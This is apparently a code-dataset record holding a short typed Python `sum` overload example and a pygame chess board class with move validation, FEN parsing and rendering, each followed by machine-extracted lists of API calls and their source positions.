2318), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((3203, 3263), 'tools.game_utils.is_strategies_equal', 'is_strategies_equal', (['kuhn_equilibrium', 'tilted_agent_strategy'], {}), '(kuhn_equilibrium, tilted_agent_strategy)\n', (3222, 3263), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n')] |
import functools
import operator
from collections.abc import Iterable
from typing import overload, Union, TypeVar
T = TypeVar('T')
S = TypeVar('S') # <1>
@overload
def sum(it: Iterable[T]) -> Union[T, int]: ... # <2>
@overload
def sum(it: Iterable[T], /, start: S) -> Union[T, S]: ... # <3>
def sum(it, /, start=0): # <4>
return functools.reduce(operator.add, it, start)
| [
"functools.reduce",
"typing.TypeVar"
] | [((119, 131), 'typing.TypeVar', 'TypeVar', (['"""T"""'], {}), "('T')\n", (126, 131), False, 'from typing import overload, Union, TypeVar\n'), ((136, 148), 'typing.TypeVar', 'TypeVar', (['"""S"""'], {}), "('S')\n", (143, 148), False, 'from typing import overload, Union, TypeVar\n'), ((339, 380), 'functools.reduce', 'functools.reduce', (['operator.add', 'it', 'start'], {}), '(operator.add, it, start)\n', (355, 380), False, 'import functools\n')] |
from __future__ import annotations
import math
from collections import deque
from typing import Optional, Callable
import numpy as np
import pygame
from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, \
PIECE_INDICES, init_zobrist, MoveFlags, GameState
from chess.utils import load_image, load_font
class Chessboard:
"""Chessboard interface (8x8 field)"""
def __init__(self, light_colour="#F0D9B5", dark_colour="#B58863") -> None:
# Board itself
self._board = np.array([Piece.empty()] * 64)
# Active colour
self._active_colour = PieceColour.White
# Castling rights
self._castling_rights = {
PieceColour.White: {
CastlingType.KingSide: False,
CastlingType.QueenSide: False
},
PieceColour.Black: {
CastlingType.KingSide: False,
CastlingType.QueenSide: False
}
}
# Store piece types as strings
self._get_piece_str = {PieceType.Pawn: "pawn",
PieceType.Knight: "knight",
PieceType.Bishop: "bishop",
PieceType.Rook: "rook",
PieceType.Queen: "queen",
PieceType.King: "king"}
# Store piece move validators
self._get_validator: dict[
PieceType, Callable[[int, int, int, int], bool]] \
= {PieceType.Pawn: self._can_pawn_make,
PieceType.Knight: self._can_knight_make,
PieceType.Bishop: self._can_bishop_make,
PieceType.Rook: self._can_rook_make,
PieceType.Queen: self._can_queen_make,
PieceType.King: self._can_king_make}
# En Passant target
self._en_passant_target: Optional[int] = None
# Half-move clock
self._halfmoves = 0
# Init zobrist hash
self._z_table = init_zobrist()
# Board appearance
self._light_colour = pygame.Color(light_colour)
self._dark_colour = pygame.Color(dark_colour)
self._light_complementary = pygame.Color("#DBAB84")
self._dark_complementary = pygame.Color("#DBC095")
self._move_colour = pygame.Color("#8D80AD")
self._bg_colour = pygame.Color("#443742")
self._side = 100 # px
self._font_size = 45
self._font_gap = 15
self._font = load_font("ubuntumono/UbuntuMono-R.ttf", self._font_size)
self._font_colour = pygame.Color("white")
@property
def board(self) -> np.ndarray:
return self._board
@property
def halfmoves(self) -> int:
return self._halfmoves
@property
def active_colour(self) -> PieceColour:
return self._active_colour
@property
def passive_colour(self) -> PieceColour:
return PieceColour.White if self._active_colour == PieceColour.Black else PieceColour.Black
def hash(self) -> int:
h = 0
for i in range(64):
piece = self._board[i]
if piece.Type != PieceType.Empty:
j = PIECE_INDICES[piece.Type.value | piece.Colour.value]
h ^= self._z_table[i][j]
return h
def set_colours(self, light_colour: str, dark_colour: str,
light_complementary: str, dark_complementary: str) -> None:
self._light_colour = pygame.Color(light_colour)
self._dark_colour = pygame.Color(dark_colour)
self._light_complementary = pygame.Color(light_complementary)
self._dark_complementary = pygame.Color(dark_complementary)
def render(self, screen: pygame.Surface,
last_move=None, skip=None, pos=None, game_info=None) -> None:
"""Render chessboard"""
if skip is not None and pos is None:
raise ValueError("skip is not None but pos is None")
screen.fill(self._bg_colour)
group = pygame.sprite.Group()
grabbed_data = None
skip: Optional[tuple[int]]
can_move_now = None if skip is None else self._get_all_piece_moves(skip[0] + skip[1] * 8)
for i, piece in enumerate(self._board):
x, y = i % 8, i // 8
if pos is not None and i in can_move_now:
pygame.draw.rect(screen, self._move_colour,
(x * self._side, y * self._side,
self._side, self._side))
elif last_move is not None and last_move.From == i:
pygame.draw.rect(screen, self._light_complementary,
(x * self._side, y * self._side,
self._side, self._side))
elif last_move is not None and last_move.To == i or (x, y) == skip:
pygame.draw.rect(screen, self._dark_complementary,
(x * self._side, y * self._side,
self._side, self._side))
else:
if (x + y) % 2 == 0:
colour = self._light_colour
else:
colour = self._dark_colour
pygame.draw.rect(screen, colour,
(x * self._side, y * self._side,
self._side, self._side))
if piece.Type == PieceType.Empty:
continue
elif (x, y) == skip:
grabbed_data = f"{self._get_piece_str[piece.Type]}_" \
f"{'w' if piece.Colour == PieceColour.White else 'b'}.png", i, group
else:
PieceSprite(
f"{self._get_piece_str[piece.Type]}_"
f"{'w' if piece.Colour == PieceColour.White else 'b'}"
f".png", i, group)
if grabbed_data is not None:
grabbed_piece = PieceSprite(*grabbed_data)
grabbed_piece.rect.x = pos[0] - 50 # type: ignore
grabbed_piece.rect.y = pos[1] - 50 # type: ignore
group.draw(screen)
text = ["Ход " + ("белых"
if self._active_colour == PieceColour.White
else "чёрных")]
if game_info is not None:
text.extend([f"Оценка: {game_info[0]}",
f"Позиций: {game_info[2]}",
f"Глубина: {game_info[3]}",
f"Время: {game_info[1]}с"])
line_pos = (screen.get_rect().h -
len(text) * (self._font_size + self._font_gap) -
self._font_gap) // 2
for line in text:
line_rendered = self._font.render(line, True, self._font_colour)
l_rect = line_rendered.get_rect()
screen.blit(line_rendered, (800 + (400 - l_rect.w) // 2, line_pos))
line_pos += self._font_size + self._font_gap
def at(self, x: int, y: int) -> Piece:
"""Get piece from position on the board"""
if 0 <= x <= 7 and 0 <= y <= 7:
return self._board[x + y * 8]
return Piece.empty()
def toggle_state(self) -> GameState:
"""Return game state after active colour move"""
other_colour = PieceColour.Black \
if self._active_colour == PieceColour.White \
else PieceColour.White
self._active_colour = other_colour
if self.get_all_moves(other_colour):
return GameState.Continue
elif self.king_is_safe(other_colour):
return GameState.Stalemate
else:
return GameState.Checkmate
def _force_can_make(self, move: Move) -> Optional[Move]:
"""
Check if the move is correct with adding corresponding flags
(!) Without checking king safety and turn order
"""
# Can't make incorrect move
if move.Captured != self._board[move.To]:
return None
this_piece: Piece = self._board[move.From]
other_piece: Piece = self._board[move.To]
# Can't make move w/o piece itself
if this_piece.Type == PieceType.Empty:
return None
# Can't eat pieces of your colour
if other_piece.Type != PieceType.Empty and \
other_piece.Colour == this_piece.Colour:
return None
# Resolving piece xy coordinates to calculate move possibility
y1, y2 = move.From // 8, move.To // 8
x1, x2 = move.From % 8, move.To % 8
# Castling
if this_piece.Type == PieceType.King and \
y1 == y2 and abs(x1 - x2) == 2 \
and move.Captured == Piece.empty():
castling = CastlingType.QueenSide if x1 - x2 == 2 \
else CastlingType.KingSide
if castling == CastlingType.QueenSide and (
self._board[move.To - 1] != Piece.empty() or
self._board[move.From - 1] != Piece.empty() or
self._board[move.From - 2] != Piece.empty()):
return None
elif castling == CastlingType.KingSide and (
self._board[move.From + 1] != Piece.empty() or
self._board[move.From + 2] != Piece.empty()):
return None
if self._castling_rights[this_piece.Colour][castling]:
lost_castling = {castling}
other_side = CastlingType.KingSide \
if castling == CastlingType.QueenSide \
else CastlingType.QueenSide
if self._castling_rights[this_piece.Colour][other_side]:
lost_castling.add(other_side)
move.Flags = MoveFlags(Castling=castling,
LoseCastling=lost_castling)
else:
return None
elif this_piece.Type == PieceType.King:
# Losing castling rights after king move
lost_castling = set()
if self._castling_rights[this_piece.Colour][CastlingType.KingSide]:
lost_castling.add(CastlingType.KingSide)
if self._castling_rights[this_piece.Colour][CastlingType.QueenSide]:
lost_castling.add(CastlingType.QueenSide)
move.Flags = MoveFlags(LoseCastling=lost_castling)
elif this_piece.Type == PieceType.Rook:
# Losing castling rights after rook move
if x1 == 0 and self._castling_rights[this_piece.Colour][CastlingType.QueenSide]:
move.Flags = MoveFlags(LoseCastling={CastlingType.QueenSide})
elif x1 == 7 and self._castling_rights[this_piece.Colour][CastlingType.KingSide]:
move.Flags = MoveFlags(LoseCastling={CastlingType.KingSide})
elif this_piece.Type == PieceType.Pawn and 0 <= move.To <= 7:
move.Flags = MoveFlags(PawnPromotion=PieceType.Queen)
if self._get_validator[this_piece.Type](x1, y1, x2, y2):
return move
return None
def can_make(self, move: Move) -> Optional[Move]:
"""Check if the move is correct"""
# Checking basic move correctness
completed_move = self._force_can_make(move)
if completed_move is not None:
# Can't capture the king
if self._board[move.To].Type == PieceType.King:
return None
# Checking king safety
self.make_move(move)
safety = self.king_is_safe(self._board[move.To].Colour)
self.unmake_move(move)
return completed_move if safety else None
return None
def make_move(self, move: Move) -> None:
"""
Make move on the board
Use board.make_move() to check if move is correct
"""
# Removing castling rights
if move.Flags.LoseCastling is not None:
this_colour = self._board[move.From].Colour
for castling in move.Flags.LoseCastling:
self._castling_rights[this_colour][castling] = False
# Moving piece
self._halfmoves += 1
self._board[move.To] = self._board[move.From]
self._board[move.From] = Piece.empty()
if move.Flags.PawnPromotion is not None:
self._board[move.To] = Piece(move.Flags.PawnPromotion,
self._board[move.To].Colour)
# Doing castling
if move.Flags.Castling is not None:
if move.Flags.Castling == CastlingType.KingSide:
self._board[move.From + 1] = self._board[move.To + 1]
self._board[move.To + 1] = Piece.empty()
else:
self._board[move.From - 1] = self._board[move.To - 2]
self._board[move.To - 2] = Piece.empty()
def unmake_move(self, move: Move) -> None:
"""Unmake move on the board (no additional checking)"""
# Returning castling rights
if move.Flags.LoseCastling is not None:
this_colour = self._board[move.To].Colour
for castling in move.Flags.LoseCastling:
self._castling_rights[this_colour][castling] = True
# Unmoving piece
self._halfmoves -= 1
self._board[move.From] = self._board[move.To]
self._board[move.To] = move.Captured
# Demoting pawn
if move.Flags.PawnPromotion is not None:
self._board[move.From] = Piece(PieceType.Pawn,
self._board[move.From].Colour)
# Undoing castling
if move.Flags.Castling is not None:
if move.Flags.Castling == CastlingType.KingSide:
self._board[move.To + 1] = self._board[move.From + 1]
self._board[move.From + 1] = Piece.empty()
else:
self._board[move.To - 2] = self._board[move.From - 1]
self._board[move.From - 1] = Piece.empty()
def get_all_moves(self, colour: PieceColour, no_castling=False) -> deque[Move]:
moves: deque[Move] = deque()
for i, piece_from in enumerate(self._board):
if piece_from.Type == PieceType.Empty or \
piece_from.Colour != colour:
continue
for j, piece_to in enumerate(self._board):
move = self.can_make(Move(i, j, piece_to))
if move is not None and (not no_castling or move.Flags.Castling is None):
moves.append(move)
return moves
def _get_all_piece_moves(self, pos: int) -> deque[int]:
moves: deque[int] = deque()
for i, piece_to in enumerate(self._board):
move = self.can_make(Move(pos, i, piece_to))
if move is not None:
moves.append(move.To)
return moves
def king_is_safe(self, colour: PieceColour) -> bool:
"""Check if king is safe on current board state"""
king_pos = np.where(self._board == Piece(PieceType.King, colour))[0][0]
king_x, king_y = king_pos % 8, king_pos // 8
right_side = range(king_x + 1, 8)
left_side = range(king_x - 1, -1, -1)
bottom_side = range(king_y + 1, 8)
top_side = range(king_y - 1, -1, -1)
o_colour = PieceColour.White if \
colour == PieceColour.Black else PieceColour.Black
o_pawn = Piece(PieceType.Pawn, o_colour)
o_knight = Piece(PieceType.Knight, o_colour)
o_bishop = Piece(PieceType.Bishop, o_colour)
o_rook = Piece(PieceType.Rook, o_colour)
o_queen = Piece(PieceType.Queen, o_colour)
o_king = Piece(PieceType.King, o_colour)
# Horizontal and vertical
def _line(iter_side: range, const_x: bool) -> bool:
for component in iter_side:
attacking_piece = self.at(king_x, component) \
if const_x \
else self.at(component, king_y)
if attacking_piece.Type != PieceType.Empty:
if attacking_piece == o_rook or \
attacking_piece == o_queen:
return True
return False
return False
if _line(right_side, False) or _line(left_side, False) or \
_line(top_side, True) or _line(bottom_side, True):
return False
# All diagonals
def _diagonal(iter_side_x: range, iter_side_y: range) -> bool:
for x, y in zip(iter_side_x, iter_side_y):
attacking_piece = self.at(x, y)
if attacking_piece.Type != PieceType.Empty:
if attacking_piece == o_bishop or \
attacking_piece == o_queen:
return True
return False
return False
if _diagonal(right_side, bottom_side) or \
_diagonal(left_side, bottom_side) or \
_diagonal(right_side, top_side) or \
_diagonal(left_side, top_side):
return False
# Pawns
sign_ = -1 if colour == PieceColour.White else 1
if self.at(king_x + 1, king_y + sign_) == o_pawn or \
self.at(king_x - 1, king_y + sign_) == o_pawn:
return False
# Knight
if self.at(king_x + 1, king_y + 2) == o_knight or \
self.at(king_x - 1, king_y + 2) == o_knight or \
self.at(king_x + 2, king_y + 1) == o_knight or \
self.at(king_x - 2, king_y + 1) == o_knight or \
self.at(king_x + 1, king_y - 2) == o_knight or \
self.at(king_x - 1, king_y - 2) == o_knight or \
self.at(king_x + 2, king_y - 1) == o_knight or \
self.at(king_x - 2, king_y - 1) == o_knight:
return False
# King
opponent_king_pos = np.where(self._board == o_king)[0][0]
if self._can_king_make(opponent_king_pos % 8,
opponent_king_pos // 8,
king_x, king_y):
return False
return True
def _can_pawn_make(self, x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if pawn can make move"""
direction = -1 if \
self._board[y1 * 8 + x1].Colour == PieceColour.White \
else 1
to_capture = self._board[y2 * 8 + x2].Type != PieceType.Empty
dx = abs(x2 - x1)
if y2 - y1 == direction and \
((dx == 1 and to_capture) or (dx == 0 and not to_capture)):
return True
return (not to_capture and
(y1 == 1 or y1 == 6) and
y2 - y1 == direction * 2 and
dx == 0 and self._board[y1 * 8 + x1 + direction * 8].Type ==
PieceType.Empty)
@staticmethod
def _can_knight_make(x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if knight can make move"""
dx, dy = abs(x2 - x1), abs(y2 - y1)
return dx == 1 and dy == 2 or dx == 2 and dy == 1
def _can_bishop_make(self, x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if bishop can make move"""
return (abs(x1 - x2) == abs(y1 - y2)) and self._diagonal_is_free(
x1, y1, x2, y2)
def _can_rook_make(self, x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if rook can make move"""
return self._horizontal_is_free(x1, y1, x2, y2) \
if y1 == y2 else self._vertical_is_free(x1, y1, x2, y2) \
if x1 == x2 else False
def _can_queen_make(self, x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if queen can make move"""
return \
self._can_bishop_make(x1, y1, x2, y2) or \
self._can_rook_make(x1, y1, x2, y2)
@staticmethod
def _can_king_make(x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if king can make move"""
return (abs(x2 - x1) < 2 and abs(y2 - y1) < 2) or \
(abs(x1 - x2) == 2 and y1 == y2)
def _diagonal_is_free(self, x1: int, y1: int, x2: int, y2: int) -> bool:
"""Check if diagonal is free (not included end points)"""
sign_x = int(math.copysign(1, x2 - x1))
sign_y = int(math.copysign(1, y2 - y1))
for x, y in zip(range(x1 + sign_x, x2, sign_x),
range(y1 + sign_y, y2, sign_y)):
if self._board[y * 8 + x].Type != PieceType.Empty:
return False
return True
def _horizontal_is_free(self, x1: int, y1: int, x2: int, _: int) -> bool:
"""Check if horizontal is free (not included end points)"""
sign = int(math.copysign(1, x2 - x1))
for x in range(x1 + sign, x2, sign):
if self._board[y1 * 8 + x].Type != PieceType.Empty:
return False
return True
def _vertical_is_free(self, x1: int, y1: int, _: int, y2: int) -> bool:
"""Check if vertical is free (not included end points)"""
sign = int(math.copysign(1, y2 - y1))
for y in range(y1 + sign, y2, sign):
if self._board[y * 8 + x1].Type != PieceType.Empty:
return False
return True
@classmethod
def _parse_fen(cls, fen_string: str) -> Chessboard:
"""
Parse FEN string,
use Chessboard.from_fen() instead
"""
# Setup
error_info = f"Invalid FEN string: {fen_string}"
tmp_board = cls()
fen_dict = {"p": PieceType.Pawn,
"n": PieceType.Knight,
"b": PieceType.Bishop,
"r": PieceType.Rook,
"q": PieceType.Queen,
"k": PieceType.King}
fields = fen_string.split()
assert len(fields) == 6, error_info
tmp_position = 0
# Parse First field (Piece Placement)
for sym in fields[0]:
if sym == "/":
assert tmp_position % 8 == 0, error_info
continue
if sym.isdigit():
tmp_position += int(sym)
assert tmp_position < 65, error_info
continue
assert sym.lower() in fen_dict, error_info
clr = PieceColour.White if sym.isupper() else PieceColour.Black
type_ = fen_dict[sym.lower()]
tmp_board._board[tmp_position] = Piece(type_, clr)
tmp_position += 1
assert tmp_position == 64, error_info
# Parse Second Field (Active Color)
if fields[1] == "b":
tmp_board._active_colour = PieceColour.Black
elif fields[1] == "w":
tmp_board._active_colour = PieceColour.White
else:
assert False, error_info
# Parse Third field (Castling Rights)
if fields[2] != "-":
for castling in fields[2]:
if castling.lower() == "q":
tmp_board._castling_rights[
PieceColour.White if castling.isupper()
else PieceColour.Black][CastlingType.QueenSide] = True
elif castling.lower() == "k":
tmp_board._castling_rights[
PieceColour.White if castling.isupper()
else PieceColour.Black][CastlingType.KingSide] = True
else:
assert False, error_info
# Parse Fourth field (Possible En Passant Targets)
alg_cell = fields[3]
if alg_cell != "-":
assert len(alg_cell) == 2, error_info
assert 96 < ord(alg_cell[0]) < 105, error_info
assert alg_cell[1].isdigit() and 0 < int(alg_cell[1]) < 9
tmp_board._en_passant_target = int(
(8 - int(alg_cell[1])) * 8 + ord(alg_cell[0]) - 97)
# Parse Fifth field (Full-move Number)
assert fields[4].isnumeric()
# Parse Sixth field (Half-move Clock)
assert fields[5].isnumeric() and int(fields[5]) >= 0, error_info
tmp_board._halfmoves = int(fields[5])
return tmp_board
@classmethod
def from_fen(cls, fen_string: str) -> Chessboard:
"""Create Chessboard using FEN"""
try:
return cls._parse_fen(fen_string)
except AssertionError as e:
raise ValueError(str(e))
@classmethod
def from_state(cls, state: np.ndarray) -> Chessboard:
"""Create Chessboard using state"""
tmp_board = cls()
tmp_board._board = state
return tmp_board
class PieceSprite(pygame.sprite.Sprite):
"""Piece class for drawing on a board"""
def __init__(self, sprite_img: str, pos: int,
*groups: pygame.sprite.AbstractGroup):
super().__init__(*groups)
self.image = load_image(sprite_img)
self.rect = self.image.get_rect()
self.move_sprite(pos)
def move_sprite(self, position: int) -> None:
self.rect.x = position % 8 * 100 # type: ignore
self.rect.y = position // 8 * 100 # type: ignore
| [
"chess.utils.load_image",
"collections.deque",
"numpy.where",
"pygame.sprite.Group",
"chess.const.Move",
"chess.const.Piece.empty",
"math.copysign",
"chess.const.MoveFlags",
"pygame.draw.rect",
"pygame.Color",
"chess.utils.load_font",
"chess.const.Piece",
"chess.const.init_zobrist"
] | [((1993, 2007), 'chess.const.init_zobrist', 'init_zobrist', ([], {}), '()\n', (2005, 2007), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((2064, 2090), 'pygame.Color', 'pygame.Color', (['light_colour'], {}), '(light_colour)\n', (2076, 2090), False, 'import pygame\n'), ((2119, 2144), 'pygame.Color', 'pygame.Color', (['dark_colour'], {}), '(dark_colour)\n', (2131, 2144), False, 'import pygame\n'), ((2181, 2204), 'pygame.Color', 'pygame.Color', (['"""#DBAB84"""'], {}), "('#DBAB84')\n", (2193, 2204), False, 'import pygame\n'), ((2240, 2263), 'pygame.Color', 'pygame.Color', (['"""#DBC095"""'], {}), "('#DBC095')\n", (2252, 2263), False, 'import pygame\n'), ((2292, 2315), 'pygame.Color', 'pygame.Color', (['"""#8D80AD"""'], {}), "('#8D80AD')\n", (2304, 2315), False, 'import pygame\n'), ((2342, 2365), 'pygame.Color', 'pygame.Color', (['"""#443742"""'], {}), "('#443742')\n", (2354, 2365), False, 'import pygame\n'), ((2475, 2532), 'chess.utils.load_font', 'load_font', (['"""ubuntumono/UbuntuMono-R.ttf"""', 'self._font_size'], {}), "('ubuntumono/UbuntuMono-R.ttf', self._font_size)\n", (2484, 2532), False, 'from chess.utils import load_image, load_font\n'), ((2561, 2582), 'pygame.Color', 'pygame.Color', (['"""white"""'], {}), "('white')\n", (2573, 2582), False, 'import pygame\n'), ((3447, 3473), 'pygame.Color', 'pygame.Color', (['light_colour'], {}), '(light_colour)\n', (3459, 3473), False, 'import pygame\n'), ((3502, 3527), 'pygame.Color', 'pygame.Color', (['dark_colour'], {}), '(dark_colour)\n', (3514, 3527), False, 'import pygame\n'), ((3564, 3597), 'pygame.Color', 'pygame.Color', (['light_complementary'], {}), '(light_complementary)\n', (3576, 3597), False, 'import pygame\n'), ((3633, 3665), 'pygame.Color', 'pygame.Color', (['dark_complementary'], {}), '(dark_complementary)\n', (3645, 3665), False, 'import pygame\n'), ((3984, 4005), 'pygame.sprite.Group', 'pygame.sprite.Group', ([], {}), '()\n', (4003, 4005), False, 'import pygame\n'), ((7122, 7135), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (7133, 7135), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((12173, 12186), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (12184, 12186), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((14027, 14034), 'collections.deque', 'deque', ([], {}), '()\n', (14032, 14034), False, 'from collections import deque\n'), ((14570, 14577), 'collections.deque', 'deque', ([], {}), '()\n', (14575, 14577), False, 'from collections import deque\n'), ((15326, 15357), 'chess.const.Piece', 'Piece', (['PieceType.Pawn', 'o_colour'], {}), '(PieceType.Pawn, o_colour)\n', (15331, 15357), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((15377, 15410), 'chess.const.Piece', 'Piece', (['PieceType.Knight', 'o_colour'], {}), '(PieceType.Knight, o_colour)\n', (15382, 15410), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((15430, 15463), 'chess.const.Piece', 'Piece', (['PieceType.Bishop', 'o_colour'], {}), '(PieceType.Bishop, o_colour)\n', (15435, 15463), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((15481, 15512), 'chess.const.Piece', 'Piece', (['PieceType.Rook', 'o_colour'], {}), '(PieceType.Rook, o_colour)\n', (15486, 15512), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((15531, 15563), 'chess.const.Piece', 'Piece', (['PieceType.Queen', 'o_colour'], {}), '(PieceType.Queen, o_colour)\n', (15536, 15563), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((15581, 15612), 'chess.const.Piece', 'Piece', (['PieceType.King', 'o_colour'], {}), '(PieceType.King, o_colour)\n', (15586, 15612), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((24726, 24748), 'chess.utils.load_image', 'load_image', (['sprite_img'], {}), '(sprite_img)\n', (24736, 24748), False, 'from chess.utils import load_image, load_font\n'), ((12271, 12331), 'chess.const.Piece', 'Piece', (['move.Flags.PawnPromotion', 'self._board[move.To].Colour'], {}), '(move.Flags.PawnPromotion, self._board[move.To].Colour)\n', (12276, 12331), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((13409, 13461), 'chess.const.Piece', 'Piece', (['PieceType.Pawn', 'self._board[move.From].Colour'], {}), '(PieceType.Pawn, self._board[move.From].Colour)\n', (13414, 13461), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((20155, 20180), 'math.copysign', 'math.copysign', (['(1)', '(x2 - x1)'], {}), '(1, x2 - x1)\n', (20168, 20180), False, 'import math\n'), ((20203, 20228), 'math.copysign', 'math.copysign', (['(1)', '(y2 - y1)'], {}), '(1, y2 - y1)\n', (20216, 20228), False, 'import math\n'), ((20621, 20646), 'math.copysign', 'math.copysign', (['(1)', '(x2 - x1)'], {}), '(1, x2 - x1)\n', (20634, 20646), False, 'import math\n'), ((20968, 20993), 'math.copysign', 'math.copysign', (['(1)', '(y2 - y1)'], {}), '(1, y2 - y1)\n', (20981, 20993), False, 'import math\n'), ((22326, 22343), 'chess.const.Piece', 'Piece', (['type_', 'clr'], {}), '(type_, clr)\n', (22331, 22343), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((4318, 4423), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', 'self._move_colour', '(x * self._side, y * self._side, self._side, self._side)'], {}), '(screen, self._move_colour, (x * self._side, y * self._side,\n self._side, self._side))\n', (4334, 4423), False, 'import pygame\n'), ((8664, 8677), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (8675, 8677), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((9709, 9765), 'chess.const.MoveFlags', 'MoveFlags', ([], {'Castling': 'castling', 'LoseCastling': 'lost_castling'}), '(Castling=castling, LoseCastling=lost_castling)\n', (9718, 9765), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((10287, 10324), 'chess.const.MoveFlags', 'MoveFlags', ([], {'LoseCastling': 'lost_castling'}), '(LoseCastling=lost_castling)\n', (10296, 10324), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((12616, 12629), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (12627, 12629), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((12761, 12774), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (12772, 12774), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((13752, 13765), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (13763, 13765), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((13899, 13912), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (13910, 13912), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((14662, 14684), 'chess.const.Move', 'Move', (['pos', 'i', 'piece_to'], {}), '(pos, i, piece_to)\n', (14666, 14684), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((17840, 17871), 'numpy.where', 'np.where', (['(self._board == o_king)'], {}), '(self._board == o_king)\n', (17848, 17871), True, 'import numpy as np\n'), ((526, 539), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (537, 539), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((4567, 4680), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', 'self._light_complementary', '(x * self._side, y * self._side, self._side, self._side)'], {}), '(screen, self._light_complementary, (x * self._side, y *\n self._side, self._side, self._side))\n', (4583, 4680), False, 'import pygame\n'), ((14309, 14329), 'chess.const.Move', 'Move', (['i', 'j', 'piece_to'], {}), '(i, j, piece_to)\n', (14313, 14329), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((4840, 4952), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', 'self._dark_complementary', '(x * self._side, y * self._side, self._side, self._side)'], {}), '(screen, self._dark_complementary, (x * self._side, y *\n self._side, self._side, self._side))\n', (4856, 4952), False, 'import pygame\n'), ((5204, 5299), 'pygame.draw.rect', 'pygame.draw.rect', (['screen', 'colour', '(x * self._side, y * self._side, self._side, self._side)'], {}), '(screen, colour, (x * self._side, y * self._side, self.\n _side, self._side))\n', (5220, 5299), False, 'import pygame\n'), ((8890, 8903), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (8901, 8903), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((8957, 8970), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (8968, 8970), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((9024, 9037), 'chess.const.Piece.empty', 'Piece.empty', ([], {}), '()\n', (9035, 9037), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((10548, 10596), 'chess.const.MoveFlags', 'MoveFlags', ([], {'LoseCastling': '{CastlingType.QueenSide}'}), '(LoseCastling={CastlingType.QueenSide})\n', (10557, 10596), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((10863, 10903), 'chess.const.MoveFlags', 'MoveFlags', ([], {'PawnPromotion': 'PieceType.Queen'}), '(PawnPromotion=PieceType.Queen)\n', (10872, 10903), False, 'from chess.const import PieceType, PieceColour, Piece, CastlingType, Move, PIECE_INDICES, init_zobrist, MoveFlags, GameState\n'), ((14938, 14967), 